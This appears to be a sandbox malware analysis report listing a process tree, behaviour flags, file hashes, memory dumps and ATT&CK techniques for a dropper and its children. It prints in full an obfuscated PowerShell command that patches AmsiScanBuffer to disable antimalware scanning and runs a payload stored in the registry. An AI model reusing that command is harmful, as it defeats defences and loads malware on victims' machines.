C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mBaHdzMYzvDa{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$niVheqHByRnEmo,[Parameter(Position=1)][Type]$TkrtvzmLFo)$SDlcOSEWejH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+'t'+''+'e'+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'em'+'o'+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+'yp'+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+'u'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$SDlcOSEWejH.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+'i'+'a'+''+[Char](108)+''+[Char](78)+''+'a'+'m'+[Char](101)+''+','+''+[Char](72)+''+'i'+'deB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$niVheqHByRnEmo).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'ed');$SDlcOSEWejH.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+','+'Ne'+'w'+''+'S'+''+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+'ir'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$TkrtvzmLFo,$niVheqHByRnEmo).SetImplementationFlags(''+'R'+'un'+'t'+'im'+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $SDlcOSEWejH.CreateType();}$jhaQOxOOVeYdY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'feN'+[Char](97)+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$FTraKBMQSkUVrq=$jhaQOxOOVeYdY.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+'cA'+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'lic'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ehXpyxDpjqSfKyFqxDV=mBaHdzMYzvDa @([String])([IntPtr]);$sRMwyseYRMKuJiWgTvlMrt=mBaHdzMYzvDa @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AZnZUmPDNAs=$jhaQOxOOVeYdY.GetMethod(''+'G'+'e'+'t'+'M'+[Char](111)+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+[Char](97)+'ndl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+'l'+'3'+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$YKxhrbNZMaIpAo=$FTraKBMQSkUVrq.Invoke($Null,@([Object]$AZnZUmPDNAs,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$NUgSFahSZhVULgnon=$FTraKBMQSkUVrq.Invoke($Null,@([Object]$AZnZUmPDNAs,[Object]('V'+[Char](105)+''+[Char](114)+'tu'+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$ZdEKIbc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YKxhrbNZMaIpAo,$ehXpyxDpjqSfKyFqxDV).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$kRgVdjrEVFpPREfju=$FTraKBMQSkUVrq.Invoke($Null,@([Object]$ZdEKIbc,[Object](''+'A'+'m'+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+'Bu'+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$bAyYKNYHwt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NUgSFahSZhVULgnon,$sRMwyseYRMKuJiWgTvlMrt).Invoke($kRgVdjrEVFpPREfju,[uint32]8,4,[ref]$bAyYKNYHwt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kRgVdjrEVFpPREfju,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NUgSFahSZhVULgnon,$sRMwyseYRMKuJiWgTvlMrt).Invoke($kRgVdjrEVFpPREfju,[uint32]8,0x20,[ref]$bAyYKNYHwt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+'s'+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4908

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1448

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2064

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2180

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2252

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2720

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2792

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3104

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3340

C:\Users\Admin\AppData\Local\Temp\dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
"C:\Users\Admin\AppData\Local\Temp\dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2364

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1352

C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
"C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
4⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3268

C:\Users\Admin\AppData\Local\Temp\$773372c6
"C:\Users\Admin\AppData\Local\Temp\$773372c6"
5⤵
- Executes dropped EXE
PID:884

C:\Users\Admin\AppData\Local\Temp\$77419698
"C:\Users\Admin\AppData\Local\Temp\$77419698"
5⤵
- Executes dropped EXE
PID:4988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3580

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3976

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4012

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4456

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:848

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:680

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4252

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1908

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

2

T1497

Credential Access

Discovery

Query Registry

3

T1012

Virtualization/Sandbox Evasion

2

T1497

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
Filesize
4.5MB

MD5
133fda00a490e613f3a6c511c1c660eb

SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
Filesize
1.8MB

MD5
8c2ad888796dd437e88eaec086475531

SHA1
f93a9948c83c4ddfe87279dd7fa167dee5baae07

SHA256
dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4

SHA512
ba5371bea752a6659b3af866b28f757b3f744d6bd597085428dd7a41f3b649edf49eaeb0375174d81a78613f4293be1cd6c68924f196c3464c20b634f1ec9346

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_jctvlo3q.rev.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1352-3918-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-21-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-20-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-19-0x0000000000C51000-0x0000000000C7F000-memory.dmp

Filesize
184KB

Download
memory/1352-18-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-40-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-4935-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1352-4936-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1784-4164-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/1784-4933-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/2020-5646-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/2020-5636-0x0000000000C50000-0x0000000001107000-memory.dmp

Filesize
4.7MB

Download
memory/2364-0-0x0000000000750000-0x0000000000C07000-memory.dmp

Filesize
4.7MB

Download
memory/2364-17-0x0000000000750000-0x0000000000C07000-memory.dmp

Filesize
4.7MB

Download
memory/2364-5-0x0000000000750000-0x0000000000C07000-memory.dmp

Filesize
4.7MB

Download
memory/2364-3-0x0000000000750000-0x0000000000C07000-memory.dmp

Filesize
4.7MB

Download
memory/2364-2-0x0000000000751000-0x000000000077F000-memory.dmp

Filesize
184KB

Download
memory/2364-1-0x00000000773B6000-0x00000000773B8000-memory.dmp

Filesize
8KB

Download
memory/3268-96-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-65-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-87-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-93-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-91-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-103-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-107-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-105-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-101-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-99-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-97-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-67-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-89-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-85-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-83-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-81-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-77-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-75-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-73-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-71-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-69-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-79-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-63-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-61-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-59-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-58-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-55-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-53-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-46-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-47-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-49-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-4930-0x00000000074C0000-0x000000000753E000-memory.dmp

Filesize
504KB

Download
memory/3268-4931-0x0000000005E10000-0x0000000005E5C000-memory.dmp

Filesize
304KB

Download
memory/3268-51-0x0000000007020000-0x000000000725A000-memory.dmp

Filesize
2.2MB

Download
memory/3268-45-0x0000000007300000-0x0000000007392000-memory.dmp

Filesize
584KB

Download
memory/3268-44-0x0000000007810000-0x0000000007DB6000-memory.dmp

Filesize
5.6MB

Download
memory/3268-4938-0x0000000072D7E000-0x0000000072D7F000-memory.dmp

Filesize
4KB

Download
memory/3268-43-0x0000000007020000-0x0000000007260000-memory.dmp

Filesize
2.2MB

Download
memory/3268-41-0x0000000072D7E000-0x0000000072D7F000-memory.dmp

Filesize
4KB

Download
memory/3268-42-0x0000000000EE0000-0x0000000001366000-memory.dmp

Filesize
4.5MB

Download
memory/3268-5599-0x0000000007730000-0x0000000007784000-memory.dmp

Filesize
336KB

Download
memory/4908-4956-0x00000237AF650000-0x00000237AF67A000-memory.dmp

Filesize
168KB

Download
memory/4908-4955-0x00000237AF2D0000-0x00000237AF2F2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads